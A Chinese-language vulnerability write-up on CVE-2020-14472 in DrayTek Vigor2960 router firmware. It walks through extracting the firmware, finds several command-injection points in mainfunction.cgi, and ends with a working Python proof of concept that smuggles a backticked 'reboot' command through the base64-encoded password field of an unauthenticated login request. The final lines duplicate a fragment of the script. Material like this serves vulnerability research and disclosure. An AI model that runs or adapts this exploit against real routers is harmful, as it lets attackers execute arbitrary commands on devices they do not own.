CVE-2020-14472
https://github.com/Cossack9989/Vulns/blob/master/IoT/CVE-2020-14472.md
下载解压固件
https://www.draytek.com.tw/ftp/Vigor2960/Firmware
使用ubi
ubireader_extract_images Vigor2960_v1.5.0.all #得到ubi文件
ubireader_extract_files file.ubi
漏洞点在/www/cgi-bin/mainfunction.cgi
流程分析
进入main函数
如果v4不符合条件
在action对应的字符串旁边找到对应的函数
漏洞点
1
命令执行漏洞
对应action为get_subconfig
sub_EA24两个参数可控
进去看
参数2最终被赋值到v16并被执行
2
doOpenVPN
可以看到控制option的值可以走到下面的分支,代码执行
3.
dogetunnel
4.
download_ovpn
5
dumpSyslog
6
set_ap_map_config
7
8
POC
未经授权的命令注入
我们发现未经授权的 mainfunction.cgi,前提是路由器可以通过SMS进行授权。该漏洞将由frompassword包含值的命令(例如“ 123456reboot”)触发。
如果路由器支持通过SMS登录并且/var/sms_phone_auth攻击者知道用户的电话号码或其中的内容,则攻击者将能够通过恶意有效负载(例如作为reboot下面的有效负载的注入)注入任意命令。
from sys import argv
from base64 import b64encode
import requests
data = {
"URL": "192.168.1.1",
"HOST": "http://192.168.1.1",
"action": "authuser",
"formusername": b64encode(b"test").decode(),
"formpassword": b64encode(b"12345678`reboot`").decode(),
"PHONENUMBER": argv[1] # the known phone number
}
header = {
"Content-Type": "application/raw"
}
url = {
"root": "http://192.168.1.1",
"cgi": {
"root": "/cgi-bin",
"uri": {
"mf": "/mainfunction.cgi",
}
}
}
def build_url(p1, p2=None):
if p2:
return url["root"] + url[p1]["root"] + url[p1]["uri"][p2]
else:
return url["root"] + url[p1]
session = requests.session()
session.post(build_url("cgi", "mf"), data=data, headers=header)
["uri"][p2]
else:
return url["root"] + url[p1]
session = requests.session()
session.post(build_url("cgi", "mf"), data=data, headers=header)